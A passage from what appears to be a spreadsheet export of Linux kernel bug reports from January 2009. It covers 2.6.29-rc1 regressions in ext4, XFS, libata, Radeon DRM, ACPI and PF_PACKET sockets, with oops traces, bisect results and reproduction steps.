c7a92b18 DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 Process (pid: 0, ti=c7a92000 task=c78cc3d0 task.ti=00000000) Stack: c05f0c4c c06ecc20 00000006 c7a92cb8 c7a92b40 c020575c c05e6c56 c7a92cb8 00000000 c05ec4e2 c7a92b5c c0205e6b 00000000 00000006 c78cc3d0 00000034 00000000 c7a92cb0 c0211b2b c05f9052 00000000 c7a92bf0 c0320a22 0000003f Call Trace: [&lt;c020575c&gt;] ? oops_end+0x6f/0x7b [&lt;c0205e6b&gt;] ? die+0x4e/0x64 [&lt;c0211b2b&gt;] ? do_page_fault+0x292/0x797 [&lt;c0320a22&gt;] ? ext4_mb_new_blocks+0x13e/0x729 [&lt;c0319e30&gt;] ? ext4_ext_get_blocks+0x1c9/0xee5 [&lt;c023c8af&gt;] ? clocksource_get_next+0x3d/0x44 [&lt;c0211899&gt;] ? do_page_fault+0x0/0x797 [&lt;c0563a2a&gt;] ? error_code+0x72/0x78 [&lt;c021faf5&gt;] ? account_system_time+0x8c/0x147 [&lt;c022b8fa&gt;] ? account_process_tick+0x19/0x41 [&lt;c022b941&gt;] ? update_process_times+0x1f/0x4e [&lt;c023e790&gt;] ? tick_periodic+0x25/0x6c [&lt;c023e7f0&gt;] ? tick_handle_periodic+0x19/0x79 [&lt;c020db09&gt;] ? smp_apic_timer_interrupt+0x57/0x88 [&lt;c0203cb4&gt;] ? apic_timer_interrupt+0x28/0x30 [&lt;c030da11&gt;] ? ext4_add_entry+0x40c/0x868 [&lt;c032d628&gt;] ? jbd2_journal_start+0xdf/0x115 [&lt;c030e681&gt;] ? ext4_add_nondir+0x15/0x4d [&lt;c030ed44&gt;] ? ext4_create+0xde/0xf1 [&lt;c030ec66&gt;] ? ext4_create+0x0/0xf1 [&lt;c027b22a&gt;] ? vfs_create+0x78/0xb8 [&lt;c027ded4&gt;] ? do_filp_open+0x6fb/0x7ca [&lt;c0563481&gt;] ? _spin_unlock+0x1d/0x20 [&lt;c0285b2e&gt;] ? alloc_fd+0x84/0xfa [&lt;c027202c&gt;] ? do_sys_open+0x4b/0xd4 [&lt;c0274b13&gt;] ? fput+0x19/0x1f [&lt;c0271f0e&gt;] ? filp_close+0x41/0x5f [&lt;c0272101&gt;] ? sys_open+0x23/0x2b [&lt;c020309e&gt;] ? syscall_call+0x7/0xb Code: 15 8c 77 64 c0 b9 20 cc 6e c0 31 d2 b8 40 b0 64 c0 e8 f7 8f cd ff a1 e0 cb 6e c0 85 c0 74 2d a1 e4 cb 6e c0 85 c0 7f 30 fb 31 db &lt;e8&gt; 05 7e ce ff 89 d8 ff 15 e0 cb 6e c0 89 c6 b8 58 89 41 00 e8 EIP: [&lt;c0560a17&gt;] panic+0x71/0xfd SS:ESP 0068:c7a92b18 Kernel panic - not syncing: Fatal exception in interrupt ------------------------------------------------------------</t>
  </si>
  <si>
    <t>keyboard not responding on dell inspiron 5160</t>
  </si>
  <si>
    <t>2009-01-11 08:41 UTC</t>
  </si>
  <si>
    <t>2009-01-17 03:06 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 7d3b56b..fe0bdec Earliest failing kernel version: 2.6.29-rc1 Distribution: slackware Hardware Environment:dell inspiron 5160 Software Environment: Problem Description: Neither in X or normal terminal is there any response from the keyboard, except from ctrl-alt-del. Logging in is impossible. After CAD init displays a reboot message, but all other messages like unmounting the file system never appear. There is no disk activity and laptop does not shutdown. ssh is possible.</t>
  </si>
  <si>
    <t>Oops while resizing an ext4 LVM2 volume</t>
  </si>
  <si>
    <t>2009-01-11 12:20 UTC</t>
  </si>
  <si>
    <t>2009-02-03 11:18 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: N/A Earliest failing kernel version: 2.6.29-rc1 Distribution: Gentoo Linux amd64 Hardware Environment: Software Environment: e2fsprogs-1.41.3 Problem Description: During a resize of an ext4 formated lvm2 volume, a NULL pointer was derefrenced. When I executed this command on a mounted LVM2 volume: # resize2fs /dev/vg1/ftp The following error happened: Jan 11 20:56:41 kerwien kernel: BUG: unable to handle kernel NULL pointer dereference at (null) Jan 11 20:56:41 kerwien kernel: IP: [&lt;ffffffffa01c6b59&gt;] ext4_block_bitmap+0x9/0x30 [ext4] Jan 11 20:56:41 kerwien kernel: PGD 1a873067 PUD 3eded067 PMD 0 Jan 11 20:56:41 kerwien kernel: Oops: 0000 [#1] SMP Jan 11 20:56:41 kerwien kernel: last sysfs file: /sys/devices/virtual/block/dm-0/range Jan 11 20:56:41 kerwien kernel: CPU 0 Jan 11 20:56:41 kerwien kernel: Modules linked in: ide_cd_mod cdrom dm_mod zlib_deflate zlib_inflate cryptomgr aead crypto_blkcipher crc32c libcrc32c crypto_hash crypto_algapi nfs lockd sunrpc cpufreq_ondemand snd_seq snd_seq_device ext4 jbd2 crc16 powernow_k8 freq_table usbhid snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm ehci_hcd ohci_hcd snd_timer floppy snd sg usbcore forcedeth soundcore k8temp snd_page_alloc hwmon thermal processor button ext3 jbd mbcache sata_nv libata sd_mod amd74xx [last unloaded: cdrom] Jan 11 20:56:41 kerwien kernel: Pid: 5202, comm: resize2fs Not tainted 2.6.29-rc1 #3 Jan 11 20:56:41 kerwien kernel: RIP: 0010:[&lt;ffffffffa01c6b59&gt;] [&lt;ffffffffa01c6b59&gt;] ext4_block_bitmap+0x9/0x30 [ext4] Jan 11 20:56:41 kerwien kernel: RSP: 0018:ffff88001a9cdbc0 EFLAGS: 00010246 Jan 11 20:56:41 kerwien kernel: RAX: ffff88003ec90000 RBX: 0000000000000200 RCX: 00000000c0000100 Jan 11 20:56:41 kerwien kernel: RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff8800333dfc00 Jan 11 20:56:41 kerwien kernel: RBP: ffff8800333dfc00 R08: ffff88001a9cc000 R09: 0000000000000000 Jan 11 20:56:41 kerwien kernel: R10: ffff880001011ff0 R11: 0000000000000001 R12: 0000000000000202 Jan 11 20:56:41 kerwien kernel: R13: ffff88003ec90000 R14: 0000000000000000 R15: ffff88003ec90000 Jan 11 20:56:41 kerwien kernel: FS: 00007fa469b62710(0000) GS:ffffffff80593040(0000) knlGS:00000000f7caeaf0 Jan 11 20:56:41 kerwien kernel: CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b Jan 11 20:56:41 kerwien kernel: CR2: 0000000000000000 CR3: 000000003eaa6000 CR4: 00000000000006e0 Jan 11 20:56:41 kerwien kernel: DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 Jan 11 20:56:41 kerwien kernel: DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Jan 11 20:56:41 kerwien kernel: Process resize2fs (pid: 5202, threadinfo ffff88001a9cc000, task ffff88003ef5e310) Jan 11 20:56:41 kerwien kernel: Stack: Jan 11 20:56:41 kerwien kernel: ffffffffa01b8877 0000000000000003 0000000000000246 0000800000000191 Jan 11 20:56:41 kerwien kernel: ffff88003f7b0a20 0000000000000000 ffff88000a5c23d8 0000000000000000 Jan 11 20:56:41 kerwien kernel: ffff88003ed400c0 ffff88003e40e888 ffff8800333dfc00 0000000000000191 Jan 11 20:56:41 kerwien kernel: Call Trace: Jan 11 20:56:41 kerwien kernel: [&lt;ffffffffa01b8877&gt;] ? ext4_init_block_bitmap+0x347/0x3d0 [ext4] Jan 11 20:56:41 kerwien kernel: [&lt;ffffffffa01d5955&gt;] ? ext4_mb_add_groupinfo+0x105/0x1f0 [ext4] Jan 11 20:56:41 kerwien kernel: [&lt;ffffffffa01cdbf1&gt;] ? ext4_group_add+0xa01/0x1330 [ext4] Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff802b3c80&gt;] ? sync_buffer+0x0/0x50 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff80430290&gt;] ? io_schedule+0x20/0x30 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8024fa70&gt;] ? wake_bit_function+0x0/0x30 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffffa01c26bf&gt;] ? ext4_ioctl+0x55f/0x6d0 [ext4] Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8035af48&gt;] ? do_output_char+0x208/0x210 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8024fc39&gt;] ? remove_wait_queue+0x19/0x60 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff80230903&gt;] ? __wake_up+0x43/0x70 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8029f74f&gt;] ? vfs_ioctl+0x2f/0xa0 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8029f9db&gt;] ? do_vfs_ioctl+0x21b/0x530 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8042fc9f&gt;] ? thread_return+0x41/0x592 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8029fd39&gt;] ? sys_ioctl+0x49/0x80 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8020c335&gt;] ? device_not_available+0x15/0x20 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8020b61b&gt;] ? system_call_fastpath+0x16/0x1b Jan 11 20:56:41 kerwien kernel: Code: 66 90 48 89 c7 45 31 ed e8 15 bd 0e e0 e9 e1 fa ff ff 0f 0b eb fe 90 90 90 90 90 90 90 90 90 90 90 90 48 8b 87 88 02 00 00 31 d2 &lt;8b&gt; 0e 48 83 38 3f 76 07 8b 56 20 48 c1 e2 20 89 c8 48 09 c2 48 Jan 11 20:56:41 kerwien kernel: RIP [&lt;ffffffffa01c6b59&gt;] ext4_block_bitmap+0x9/0x30 [ext4] Jan 11 20:56:41 kerwien kernel: RSP &lt;ffff88001a9cdbc0&gt; Jan 11 20:56:41 kerwien kernel: CR2: 0000000000000000 Jan 11 20:56:41 kerwien kernel: ---[ end trace 19e39679f9447577 ]--- Jan 11 20:56:41 kerwien kernel: ------------[ cut here ]------------ Jan 11 20:56:41 kerwien kernel: WARNING: at kernel/exit.c:1010 do_exit+0x72b/0x850() Jan 11 20:56:41 kerwien kernel: Hardware name: Jan 11 20:56:41 kerwien kernel: Modules linked in: ide_cd_mod cdrom dm_mod zlib_deflate zlib_inflate cryptomgr aead crypto_blkcipher crc32c libcrc32c crypto_hash crypto_algapi nfs lockd sunrpc cpufreq_ondemand snd_seq snd_seq_device ext4 jbd2 crc16 powernow_k8 freq_table usbhid snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm ehci_hcd ohci_hcd snd_timer floppy snd sg usbcore forcedeth soundcore k8temp snd_page_alloc hwmon thermal processor button ext3 jbd mbcache sata_nv libata sd_mod amd74xx [last unloaded: cdrom] Jan 11 20:56:41 kerwien kernel: Pid: 5202, comm: resize2fs Tainted: G D 2.6.29-rc1 #3 Jan 11 20:56:41 kerwien kernel: Call Trace: Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8023afc2&gt;] warn_slowpath+0xf2/0x130 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff80367f65&gt;] notify_update+0x25/0x30 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff80368213&gt;] vt_console_print+0x223/0x2f0 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8020bf4e&gt;] common_interrupt+0xe/0x13 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8023bca7&gt;] vprintk+0x227/0x390 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8023be5e&gt;] printk+0x4e/0x60 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8023be5e&gt;] printk+0x4e/0x60 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8023e73b&gt;] do_exit+0x72b/0x850 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff80253886&gt;] up+0x16/0x50 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8032ccb0&gt;] bit_cursor+0x0/0x5e0 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8023b7e5&gt;] release_console_sem+0x1b5/0x1f0 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8020f5a5&gt;] oops_end+0xa5/0xb0 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff80228b53&gt;] do_page_fault+0x323/0x890 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffffa01c7fe6&gt;] ext4_error+0x96/0xc0 [ext4] Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff80431cef&gt;] page_fault+0x1f/0x30 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffffa01c6b59&gt;] ext4_block_bitmap+0x9/0x30 [ext4] Jan 11 20:56:41 kerwien kernel: [&lt;ffffffffa01b8877&gt;] ext4_init_block_bitmap+0x347/0x3d0 [ext4] Jan 11 20:56:41 kerwien kernel: [&lt;ffffffffa01d5955&gt;] ext4_mb_add_groupinfo+0x105/0x1f0 [ext4] Jan 11 20:56:41 kerwien kernel: [&lt;ffffffffa01cdbf1&gt;] ext4_group_add+0xa01/0x1330 [ext4] Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff802b3c80&gt;] sync_buffer+0x0/0x50 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff80430290&gt;] io_schedule+0x20/0x30 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8024fa70&gt;] wake_bit_function+0x0/0x30 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffffa01c26bf&gt;] ext4_ioctl+0x55f/0x6d0 [ext4] Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8035af48&gt;] do_output_char+0x208/0x210 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8024fc39&gt;] remove_wait_queue+0x19/0x60 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff80230903&gt;] __wake_up+0x43/0x70 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8029f74f&gt;] vfs_ioctl+0x2f/0xa0 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8029f9db&gt;] do_vfs_ioctl+0x21b/0x530 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8042fc9f&gt;] thread_return+0x41/0x592 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8029fd39&gt;] sys_ioctl+0x49/0x80 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8020c335&gt;] device_not_available+0x15/0x20 Jan 11 20:56:41 kerwien kernel: [&lt;ffffffff8020b61b&gt;] system_call_fastpath+0x16/0x1b Jan 11 20:56:41 kerwien kernel: ---[ end trace 19e39679f9447578 ]--- Jan 11 20:57:27 kerwien kernel: ------------[ cut here ]------------ Jan 11 20:57:27 kerwien kernel: WARNING: at fs/namespace.c:636 mntput_no_expire+0x146/0x150() Jan 11 20:57:27 kerwien kernel: Hardware name: Jan 11 20:57:27 kerwien kernel: Modules linked in: ide_cd_mod cdrom dm_mod zlib_deflate zlib_inflate cryptomgr aead crypto_blkcipher crc32c libcrc32c crypto_hash crypto_algapi nfs lockd sunrpc cpufreq_ondemand snd_seq snd_seq_device ext4 jbd2 crc16 powernow_k8 freq_table usbhid snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm ehci_hcd ohci_hcd snd_timer floppy snd sg usbcore forcedeth soundcore k8temp snd_page_alloc hwmon thermal processor button ext3 jbd mbcache sata_nv libata sd_mod amd74xx [last unloaded: cdrom] Jan 11 20:57:27 kerwien kernel: Pid: 5230, comm: umount Tainted: G D W 2.6.29-rc1 #3 Jan 11 20:57:27 kerwien kernel: Call Trace: Jan 11 20:57:27 kerwien kernel: [&lt;ffffffff8023afc2&gt;] warn_slowpath+0xf2/0x130 Jan 11 20:57:27 kerwien kernel: [&lt;ffffffff802a8c75&gt;] mntput_no_expire+0x35/0x150 Jan 11 20:57:27 kerwien kernel: [&lt;ffffffff8029cf29&gt;] __link_path_walk+0xbe9/0xd50 Jan 11 20:57:27 kerwien kernel: [&lt;ffffffff802305cc&gt;] update_curr+0x6c/0xc0 Jan 11 20:57:27 kerwien kernel: [&lt;ffffffff802305cc&gt;] update_curr+0x6c/0xc0 Jan 11 20:57:27 kerwien kernel: [&lt;ffffffff8023055a&gt;] wakeup_preempt_entity+0x3a/0x40 Jan 11 20:57:27 kerwien kernel: [&lt;ffffffff80237413&gt;] check_preempt_wakeup+0x113/0x150 Jan 11 20:57:27 kerwien kernel: [&lt;ffffffff80233dae&gt;] try_to_wake_up+0x10e/0x1b0 Jan 11 20:57:27 kerwien kernel: [&lt;ffffffff802a1bd5&gt;] pollwake+0x55/0x60 Jan 11 20:57:27 kerwien kernel: [&lt;ffffffff80233e50&gt;] default_wake_function+0x0/0x10 Jan 11 20:57:27 kerwien kernel: [&lt;ffffffff8022fdcb&gt;] __wake_up_common+0x5b/0x90 Jan 11 20:57:27 kerwien kernel: [&lt;ffffffff802a8d86&gt;] mntput_no_expire+0x146/0x150 Jan 11 20:57:27 kerwien kernel: [&lt;ffffffff802a9066&gt;] sys_umount+0x76/0x380 Jan 11 20:57:27 kerwien kernel: [&lt;ffffffff8020b61b&gt;] system_call_fastpath+0x16/0x1b Jan 11 20:57:27 kerwien kernel: ---[ end trace 19e39679f9447579 ]--- Steps to reproduce: Unknown. I have resized ext4 volumes a couple of time. This error has only happened once so far.</t>
  </si>
  <si>
    <t>WARNING: at drivers/ata/libata-sff.c</t>
  </si>
  <si>
    <t>2009-01-12 12:47 UTC</t>
  </si>
  <si>
    <t>2009-03-23 09:04 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.28 Earliest failing kernel version: 2.6.29-rc1 Distribution: Gentoo 64 bits Hardware Environment: Packard Bell Easynote MB86 Software Environment: Problem Description: When I boot my computer with kernel 2.6.29-rc1, I notice the following error in dmesg: [ 9.484349] Driver 'sr' needs updating - please use bus_type methods [ 9.485592] ------------[ cut here ]------------ [ 9.485598] WARNING: at drivers/ata/libata-sff.c:1017 ata_sff_hsm_move+0x6b8/0x720() [ 9.485603] Hardware name: EasyNote MB85 [ 9.485606] Modules linked in: sr_mod(+) cdrom snd_hda_intel(+) fan iwlcore snd_hda_codec mac80211 snd_pcm ohci1394 sdhci_pci cfg80211 sdhci psmouse snd_timer ieee1394 ricoh_mmc mmc_core ata_piix snd sky2 ehci_hcd uhci_hcd soundcore thermal snd_page_alloc usbcore processor container battery button ac thermal_sys dm_snapshot dm_mod ext4 crc16 jbd2 mbcache sd_mod ahci [ 9.485661] Pid: 1327, comm: udevd Not tainted 2.6.29-rc1 #1 [ 9.485665] Call Trace: [ 9.485669] &lt;IRQ&gt; [&lt;ffffffff80238652&gt;] warn_slowpath+0xf2/0x130 [ 9.485685] [&lt;ffffffff8022df20&gt;] enqueue_entity+0x20/0xf0 [ 9.485694] [&lt;ffffffff8022d676&gt;] place_entity+0x76/0x90 [ 9.485701] [&lt;ffffffff80234903&gt;] check_preempt_wakeup+0x113/0x150 [ 9.485710] [&lt;ffffffff802fdbf1&gt;] __blk_run_queue+0x11/0x30 [ 9.485718] [&lt;ffffffff80388641&gt;] scsi_eh_scmd_add+0x91/0xd0 [ 9.485725] [&lt;ffffffff803a17b9&gt;] ata_sff_data_xfer32+0xb9/0xf0 [ 9.485731] [&lt;ffffffff803a1568&gt;] ata_sff_hsm_move+0x6b8/0x720 [ 9.485738] [&lt;ffffffff803a2834&gt;] ata_sff_interrupt+0x164/0x220 [ 9.485745] [&lt;ffffffff80270a8f&gt;] __rcu_process_callbacks+0xbf/0x220 [ 9.485755] [&lt;ffffffff8026db94&gt;] handle_IRQ_event+0x34/0x70 [ 9.485761] [&lt;ffffffff8026fa26&gt;] handle_edge_irq+0xb6/0x140 [ 9.485768] [&lt;ffffffff8020d27c&gt;] call_softirq+0x1c/0x30 [ 9.485775] [&lt;ffffffff8020ecee&gt;] do_IRQ+0x7e/0x110 [ 9.485781] [&lt;ffffffff8020cb53&gt;] ret_from_intr+0x0/0xa [ 9.485785] &lt;EOI&gt; &lt;4&gt;---[ end trace be209c8a867d1b7c ]--- After a git-bisect run, it appears that the first bad commit is the following: 871af1210f13966ab911ed2166e4ab2ce775b99d is first bad commit commit 871af1210f13966ab911ed2166e4ab2ce775b99d Author: Alan Cox &lt;alan@redhat.com&gt; Date: Mon Jan 5 14:16:39 2009 +0000 libata: Add 32bit PIO support I find it rather strange since I am using a 64 bit systems, but if I revert it, the error doesn't occur.</t>
  </si>
  <si>
    <t>Xorg can't use dri on radeon X1950 AGP</t>
  </si>
  <si>
    <t>2009-01-13 05:20 UTC</t>
  </si>
  <si>
    <t>2009-02-10 21:32 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.28-rc7 Earliest failing kernel version:2.6.29-rc1 Distribution: Debian unstable Hardware Environment: amd64, radeon x1950 in a amd81xx AGP port Software Environment: Xorg 1.5 + latest radeon driver from debian experimental Problem Description: Xorg can't enable drm anymore with the new kernel, which disables about any hw accelled rendering (kde4 is dogslow). There are some messages in dmesg and Xorg.log, I'll attach them.</t>
  </si>
  <si>
    <t>X hangs following switch from radeonfb console - Bisected</t>
  </si>
  <si>
    <t>2009-01-13 14:03 UTC</t>
  </si>
  <si>
    <t>Graham Murray</t>
  </si>
  <si>
    <t>2009-03-15 03:46 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.28 Earliest failing kernel version:2.6.29-rc1 Distribution:Gentoo Hardware Environment:Core2 duo 6700, Radeon X300 Software Environment: Xorg-x11 7.4, xf86-video-ati 6.10, kde-4.1.3, libx11 1.1.5 Problem Description: On switching from KDE-4 with desktop effects enabled to 'text' console and back leave X hung with top, approximately 1/3, of screen corrupted, keyboard and mouse are unresponsive. SAK K returns to kdm login screen. If desktop effects are not enabled, all works OK. I have bisected the problem and the commit which introduces it is 7c1c2871a6a3a114853ec6836e9035ac1c0c7f7a drm: move to kref per-master structures. Steps to reproduce:Configure kernel for radeonfb, Start KDE with desktop effects enabled Switch to 'text' console and back to X Top, approximately 1/3, of screen is corrupted, keyboard and mouse are unresponsive. SAK K returns to kdm login screen.</t>
  </si>
  <si>
    <t>Jonathan Dray</t>
  </si>
  <si>
    <t>Please add fasttrax GPS evaluation kit vendor/product ID to cp2101 module.</t>
  </si>
  <si>
    <t>2009-01-15 10:27 UTC</t>
  </si>
  <si>
    <t>Wolfgang Glas</t>
  </si>
  <si>
    <t>2009-03-23 09:03 UTC</t>
  </si>
  <si>
    <t>We've got hands on a GPS evaluation kit from http://www.fastraxgps.com/products/evaluationtools/evaluationkit/ and it' actually equipped with a CP210x USB to serial bridge. The vendor/product ID is: 0x10c4/0x826b. If add this product ID to the driver cp2101.c using the patch I will attach in the sequel, this device works flawlessly under linux ;-) Please consider my patch for inclusion on the mainline. TIA, Wolfgang</t>
  </si>
  <si>
    <t>When a PF_PACKET socket using MMAP become full once, select() on the fd always returns 0.</t>
  </si>
  <si>
    <t>Linux version 2.6.27.7</t>
  </si>
  <si>
    <t>2009-01-15 12:38 UTC</t>
  </si>
  <si>
    <t>plarose</t>
  </si>
  <si>
    <t>2009-03-23 09:01 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: This bug has been commit in tree on 2008-07-15 Distribution: Hardware Environment: Software Environment: Problem Description: With a PF_PACKET socket using MMAP, if the ring buffer gets full once, all future call to select() on the fd will return 0, even if data is available on the socket. I look at the source code and the problem is in the file net/packet/af_packet.c at line 223 (and 228). if (status != h.h1-&gt;tp_status ? TP_STATUS_USER : TP_STATUS_KERNEL) The problem is that tp_status is a bitfield... As soon a 1 (or more) packet is drop, the flag TP_STATUS_LOSING always stays up in tp_status. To fix this, just adding parenthesis will do the trick. Here is the suggested fix. if (status != (h.h1-&gt;tp_status ? TP_STATUS_USER : TP_STATUS_KERNEL)) This fix should be included at line 223 and 228 of file net/packet/af_packet.c Steps to reproduce: - Write an application that opens a PF_PACKET socket and initialise MMAP on the fd. - Send traffic to the system to fill up the ring buffer, make sure a few packets are dropped because the ring is full. - Make some space in the ring buffer by reading a few packets. - At that point, all next call to select() on this fd will return 0, meaning that no packets are available on the fd (which is wrong).</t>
  </si>
  <si>
    <t>Battery status and lid switch not working on ZT Systems P7003i-74 laptop</t>
  </si>
  <si>
    <t>2009-01-16 12:45 UTC</t>
  </si>
  <si>
    <t>John Morris</t>
  </si>
  <si>
    <t>2009-04-07 02:54 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: 2.6.28 Distribution: Linux from Scratch Hardware Environment: ZT Systems P7003i-74 laptop Software Environment: Problem Description: I get various ACPI errors on boot pertaining to Battery and Lid. Battery monitoring not working. Steps to reproduce: boot</t>
  </si>
  <si>
    <t>XFS : Corruption of in-memory data</t>
  </si>
  <si>
    <t>2.6.29-rc1 (20090116 last tested)</t>
  </si>
  <si>
    <t>2009-01-17 10:57 UTC</t>
  </si>
  <si>
    <t>Haphaeu</t>
  </si>
  <si>
    <t>2009-01-21 19:08 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.28-rc8 Distribution: slackware current (20090116) Hardware Environment: Intel(R) Pentium(R) 4 CPU 2.66GHz on a ECS p4m800pro-m 2gb Software Envitonment: Gnu C 4.2.4 Gnu make 3.81 binutils 2.18.50.0.9.20080822 util-linux 2.12r mount 2.12r module-init-tools 3.5 e2fsprogs 1.41.3 jfsutils 1.1.12 reiserfsprogs 3.6.20 xfsprogs 2.10.1 Linux C Library 2.7 Dynamic linker (ldd) 2.7 Linux C++ Library 6.0.9 Procps 3.2.7 Net-tools 1.60 Kbd 1.12 Sh-utils 6.12 XFS memory corruption The problem occurs in kernels &gt;= 2.6.28-rc8 last git kernel tested: 2.6.29-rc1 (20090116) simple and clean test: mkfs.xfs -b size=1024 /dev/sdb1 mount /dev/sdb1 /mnt/sdb1 -o rw,noatime,nodiratime create/copy a file and try "clear" the data [root@0x29A]# cp /opt/firefox/profile/urlclassifier3.sqlite /mnt/sdb1 ; sync ; cd /mnt/sdb1 ; sync [root@0x29A]# &gt; urlclassifier3.sqlite XFS internal error XFS_WANT_CORRUPTED_GOTO at line 3327 of file fs/xfs/xfs_btree.c. Caller 0xc023884c Filesystem "sdb1": XFS internal error XFS_TRANS_CALCEL at line 1164 of file fs/xfs/xfs_trnas.c. Caller 0xc02637c9 Filesystem "sdb1": Corruption of in-memory data detected. Shutting down filesystem: sdb1 Please umount the filesystem ans rectify the problem(s) bash: urlclassifier3.sqlite : structure needs cleaning ---------------------------------------------------------- tested in more 2 hdds and in another computer (my old pMMX 233mhz/64mb, just for hardware sanity test =) on my lilo: append = "printk.time=1 noisapnp acpi=off irqpool" but with out this append the problem still occurs [root@0x29A]# xfs_info /dev/sdb1 meta-data=/dev/root isize=256 agcount=16, agsize=2509162 blks = sectsz=512 attr=0 data = bsize=1024 blocks=40146592, imaxpct=25 = sunit=0 swidth=0 blks naming =version 2 bsize=4096 ascii-ci=0 log =internal bsize=1024 blocks=19602, version=1 = sectsz=512 sunit=0 blks, lazy-count=0 realtime =none extsz=4096 blocks=0, rtextents=0 [root@0x29A]# cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 4 model name : Intel(R) Pentium(R) 4 CPU 2.66GHz stepping : 9 cpu MHz : 2666.440 cache size : 1024 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe lm constant_tsc pebs bts pni dtes64 monitor ds_cpl tm2 cid cx16 xtpr bogomips : 5332.95 clflush size : 64 power management: [root@0x29A]# cat /proc/modules snd_pcm_oss 33056 1 - Live 0xf93d7000 snd_mixer_oss 12864 1 snd_pcm_oss, Live 0xf93c5000 ext2 44708 1 - Live 0xfa7a2000 apm 15092 1 - Live 0xfa766000 via 37728 2 - Live 0xfa743000 drm 74592 3 via, Live 0xfa701000 brd 5196 1 - Live 0xfa6ac000 snd_via82xx 21016 1 - Live 0xf864c000 gameport 9064 1 snd_via82xx, Live 0xf8637000 snd_ac97_codec 95908 1 snd_via82xx, Live 0xf8610000 ac97_bus 1312 1 snd_ac97_codec, Live 0xf85e5000 snd_pcm 54632 3 snd_pcm_oss,snd_via82xx,snd_ac97_codec, Live 0xf85cf000 snd_timer 17252 1 snd_pcm, Live 0xf85b3000 snd_page_alloc 7624 2 snd_via82xx,snd_pcm, Live 0xf85a4000 snd_mpu401_uart 5696 1 snd_via82xx, Live 0xf859b000 snd_rawmidi 17248 1 snd_mpu401_uart, Live 0xf8580000 snd_seq_device 5836 1 snd_rawmidi, Live 0xf8541000 via_agp 7744 1 - Live 0xf8594000 uhci_hcd 20364 0 - Live 0xf8569000 snd 43140 9 snd_pcm_oss,snd_mixer_oss,snd_via82xx,snd_ac97_codec,snd_pcm,snd_timer,snd_mpu401_uart,snd_rawmidi,snd_seq_device, Live 0xf854c000 agpgart 27504 2 drm,via_agp, Live 0xf8524000 ehci_hcd 31628 0 - Live 0xf8508000 via_rhine 19880 0 - Live 0xf8acd000 mii 4256 1 via_rhine, Live 0xf8ab8000 shpchp 29364 0 - Live 0xf8aa7000 i2c_viapro 7476 0 - Live 0xf8a94000 psmouse 39408 0 - Live 0xf8a58000 soundcore 5120 2 snd, Live 0xf8a43000 rtc_cmos 8460 0 - Live 0xf8a27000 pci_hotplug 11432 1 shpchp, Live 0xf8a1a000 usbcore 118128 3 uhci_hcd,ehci_hcd, Live 0xf895a000 rtc_core 13496 1 rtc_cmos, Live 0xf8920000 i2c_core 19408 1 i2c_viapro, Live 0xf890b000 rtc_lib 2240 1 rtc_core, Live 0xf88f4000 serio_raw 4612 0 - Live 0xf88ea000 evdev 8352 0 - Live 0xf88ce000 sg 22512 0 - Live 0xf88a8000</t>
  </si>
  <si>
